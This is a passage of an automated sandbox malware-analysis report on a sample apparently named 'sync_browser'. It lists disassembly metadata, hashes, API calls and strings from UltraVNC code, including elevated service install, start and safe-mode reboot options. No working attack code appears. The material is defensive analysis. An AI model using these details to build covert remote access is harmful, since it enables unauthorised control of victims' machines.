                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                      • String ID: -rebootsafemode$p$runas
                                                                      • API String ID: 3648085421-4291177908
                                                                      • Opcode ID: ebe23701378919e1af33a6bf656780ce82059cac4ad0fb8edc734de712cd212d
                                                                      • Instruction ID: 8e35c1b32feb455a0a471f77f7ad21e29ca3c9c3ec182cc29e2fa95759eb7cf7
                                                                      • Opcode Fuzzy Hash: ebe23701378919e1af33a6bf656780ce82059cac4ad0fb8edc734de712cd212d
                                                                      • Instruction Fuzzy Hash: 2E010C35608B8585E721AF14F49439BB3A4FB88744FC00136D6CD42B18DF3CD158CB51
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                      • String ID: -stopservice$p$runas
                                                                      • API String ID: 3648085421-4230321595
                                                                      • Opcode ID: 7801f256456fabef1ba334d8cfc515ba8b90833b9c41cec9be355c3b8ea1ded8
                                                                      • Instruction ID: 3d776a63b8f9d1b45a241ea21b84b966afc5f7356ce92316450d029749069fa7
                                                                      • Opcode Fuzzy Hash: 7801f256456fabef1ba334d8cfc515ba8b90833b9c41cec9be355c3b8ea1ded8
                                                                      • Instruction Fuzzy Hash: 2F01DA36618B85C5E760AB10F4A439BB3A4FB89B48FC01236D6CD42B58EF7DD118CB51
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                      • String ID: -install$p$runas
                                                                      • API String ID: 3648085421-1683557327
                                                                      • Opcode ID: da01a03551f4b71eee5f038ed1fd70f8f3551a75722601959108e33cdc7658fd
                                                                      • Instruction ID: 8bd8b338ab0b271e5d1a5b0b70964bf6236212084a412dadfa6b44e5647bb9ba
                                                                      • Opcode Fuzzy Hash: da01a03551f4b71eee5f038ed1fd70f8f3551a75722601959108e33cdc7658fd
                                                                      • Instruction Fuzzy Hash: 5801DA36608B8585E760AB10F4A439BB3A4FB89B48FC01236D6CD42B58EF7DD118CB51
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                      • String ID: -startservice$p$runas
                                                                      • API String ID: 3648085421-278061118
                                                                      • Opcode ID: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
                                                                      • Instruction ID: 9a8d4eb680a18ba2bb023cda75cb143b95f3156e9303fada991ac4f2706fa7fe
                                                                      • Opcode Fuzzy Hash: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
                                                                      • Instruction Fuzzy Hash: 0B01DA36608B8585E760AB10F4A439BB3A4FB89B48FC01236D6CD42B58EF7DD118CB51
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %s:%s$Enter proxy authentication password for %s@%s: $Proxy-Authorization: Basic %s
                                                                      • API String ID: 0-3750121419
                                                                      • Opcode ID: dcac41199ae3c8df7bcab697df2315285d75f018ff24bfe801cf74db9f7aaf51
                                                                      • Instruction ID: b243fd631948adf708e5e51d802036edd3107322fc63ede5e93ea0a71d37517a
                                                                      • Opcode Fuzzy Hash: dcac41199ae3c8df7bcab697df2315285d75f018ff24bfe801cf74db9f7aaf51
                                                                      • Instruction Fuzzy Hash: A031E325B0468940EA10FA76A8242B9A790FB45FF4F940336FE3D87BD9DE7CD0818310
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: Thread$CreateFileMessageModuleNamePlayPostResumeSound
• String ID:
• API String ID: 3945334538-0
• Opcode ID: 26b7556e4d0159b9d5f6cfb9e8541998bd234235d3a9044272faeac152b77cb8
• Instruction ID: 503d519002c02e77b192ad57f8b320f97703786389e6384c66bfc476c7c8f616
• Opcode Fuzzy Hash: 26b7556e4d0159b9d5f6cfb9e8541998bd234235d3a9044272faeac152b77cb8
• Instruction Fuzzy Hash: 0D41F326B1894581EB10AB35F4607BDA351EBC8FA8F840132EF4D87799EE3CD481C351
APIs
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: _errno_invalid_parameter_noinfo$_fileno_ftbuf
• String ID:
• API String ID: 2434734397-0
• Opcode ID: fedb473ed8e07211a0b48662a4d4207601b42be0040328777e4ad7852e106941
• Instruction ID: 19ae3e066de2113932afc39ad3033c1d0442a171446d9c304a8524640664d1ec
• Opcode Fuzzy Hash: fedb473ed8e07211a0b48662a4d4207601b42be0040328777e4ad7852e106941
• Instruction Fuzzy Hash: E1315365A0864A81EA54B72878B0379E2826F41FA0FD14633ED2DC72D9DF7CE800D322
APIs
• malloc.LIBCMT ref: 00007FF7E508FFFD
  • Part of subcall function 00007FF7E5128C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7E5128C64
  • Part of subcall function 00007FF7E5128C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7E513329C,?,?,?,00007FF7E5137749,?,?,?,00007FF7E51377F3), ref: 00007FF7E5128C89
  • Part of subcall function 00007FF7E5128C34: _callnewh.LIBCMT ref: 00007FF7E5128CA2
  • Part of subcall function 00007FF7E5128C34: _errno.LIBCMT ref: 00007FF7E5128CAD
  • Part of subcall function 00007FF7E5128C34: _errno.LIBCMT ref: 00007FF7E5128CB8
• free.LIBCMT ref: 00007FF7E5090097
  • Part of subcall function 00007FF7E5128BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7E512748C), ref: 00007FF7E5128C0A
  • Part of subcall function 00007FF7E5128BF4: _errno.LIBCMT ref: 00007FF7E5128C14
  • Part of subcall function 00007FF7E5128BF4: GetLastError.KERNEL32(?,?,?,00007FF7E512748C), ref: 00007FF7E5128C1C
• free.LIBCMT ref: 00007FF7E50900BF
Strings
• l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF7E508FFE0
• This server does not have a valid password enabled. Until a password is set, incoming connections cannot be accepted., xrefs: 00007FF7E5090068
• vncclient.cpp : no password specified for server - client rejected, xrefs: 00007FF7E5090053
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
• String ID: This server does not have a valid password enabled. Until a password is set, incoming connections cannot be accepted.$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$vncclient.cpp : no password specified for server - client rejected
• API String ID: 1063416079-3080451256
• Opcode ID: 7436aef3344165f661bf3289f4a794c91dc4c24a9d76a1fefccbb8194f0ba96d
• Instruction ID: f08a4980229debf5333b121241dc07e05fd8d96ef6b519fb709f3dcd112bddef
• Opcode Fuzzy Hash: 7436aef3344165f661bf3289f4a794c91dc4c24a9d76a1fefccbb8194f0ba96d
• Instruction Fuzzy Hash: 2931652161868981EA50BB39E4642A9A351EF84FB0F945332F57EC76D9DE3CD4058361
APIs
• GetLastError.KERNEL32(?,?,?,00007FF7E512FFD1,?,?,?,?,00007FF7E5128C19,?,?,?,00007FF7E512748C), ref: 00007FF7E51337CE
• FlsGetValue.KERNEL32(?,?,?,00007FF7E512FFD1,?,?,?,?,00007FF7E5128C19,?,?,?,00007FF7E512748C), ref: 00007FF7E51337DC
• SetLastError.KERNEL32(?,?,?,00007FF7E512FFD1,?,?,?,?,00007FF7E5128C19,?,?,?,00007FF7E512748C), ref: 00007FF7E5133834
  • Part of subcall function 00007FF7E51332EC: Sleep.KERNEL32(?,?,?,00007FF7E51337F7,?,?,?,00007FF7E512FFD1,?,?,?,?,00007FF7E5128C19), ref: 00007FF7E5133331
• FlsSetValue.KERNEL32(?,?,?,00007FF7E512FFD1,?,?,?,?,00007FF7E5128C19,?,?,?,00007FF7E512748C), ref: 00007FF7E5133808
• free.LIBCMT ref: 00007FF7E513382B
• GetCurrentThreadId.KERNEL32 ref: 00007FF7E513381C
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: ErrorLastValue_lock$CurrentSleepThreadfree
• String ID:
• API String ID: 3106088686-0
• Opcode ID: 5f2b5b5caa0b08d9e115ab91103603327581cb969fb76fc374ee9c9b2b7431f5
• Instruction ID: bb2cb914938ba83a5c207938aab59bf30bfa72f3048cabb6d344d3fec5313c8c
• Opcode Fuzzy Hash: 5f2b5b5caa0b08d9e115ab91103603327581cb969fb76fc374ee9c9b2b7431f5
• Instruction Fuzzy Hash: 82017524A0974E82FB147F65F474239A2A1BF48F61F885235D91D823D9EE3CF805C636
APIs
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: _errno_fileno_flush_freebuf_invalid_parameter_noinfo
• String ID:
• API String ID: 3613856401-0
• Opcode ID: 22e8c468e637d92c8e7f14c6622d0db4cac7223b0f4977f25baec7dc4bd546e1
• Instruction ID: 54f0e7c40d14dd8adfb766151090aff629affbca2241c0fc15c138e193f9640c
• Opcode Fuzzy Hash: 22e8c468e637d92c8e7f14c6622d0db4cac7223b0f4977f25baec7dc4bd546e1
• Instruction Fuzzy Hash: D601D41AE0C64A81FA147A69643137C91509F55F64FA50632EA28C21CBCE3CE881A362
APIs
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
• String ID:
• API String ID: 2426525106-0
• Opcode ID: 19dd2d2afd55e3adf8fb9d01f5eac84cc95537aa2f4af578a0b97840d6351f68
• Instruction ID: 7b179b6a4fb8d567b048f992e6d43af96c213de4c4768ab868a7a1b85772a988
• Opcode Fuzzy Hash: 19dd2d2afd55e3adf8fb9d01f5eac84cc95537aa2f4af578a0b97840d6351f68
• Instruction Fuzzy Hash: B401FF26618B45D2DA54EB66F9A1278B324FF88FC0B844032DA5DC3765DF3DE461C311
APIs
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
• String ID:
• API String ID: 2426525106-0
• Opcode ID: 603f918af7fb599e57d4a8c5aa72689e5f4edbcd5d23c5f13df1708e76f5f105
• Instruction ID: bda249a51a12cafe7c649a1dbf1f82b1f823b7551804ed64e21f4b8ed4d16974
• Opcode Fuzzy Hash: 603f918af7fb599e57d4a8c5aa72689e5f4edbcd5d23c5f13df1708e76f5f105
• Instruction Fuzzy Hash: B001FF66618B45D6DA54EB66F9A1278A324FF88FC0B844033DA4DC3765DF3DE4A1C311
APIs
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
• String ID:
• API String ID: 2426525106-0
• Opcode ID: ed0781dc8889168bce117aea87ed44a54f9bb397e4d36f2ca679cd736364b467
• Instruction ID: bd1f754c487ff4c5e916f04d98b38799f427e05a941c855a22d6246e2c6a161d
• Opcode Fuzzy Hash: ed0781dc8889168bce117aea87ed44a54f9bb397e4d36f2ca679cd736364b467
• Instruction Fuzzy Hash: BEF0B766A14A45C2EB50EF65E8A1168A324FF98F84B804032D90DC2269DF3DD856C321
APIs
Strings
• vncclient.cpp : Compress returned error in File Send :%d, xrefs: 00007FF7E509BA26
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: CriticalSection$Leave$EnterFileRead
• String ID: vncclient.cpp : Compress returned error in File Send :%d
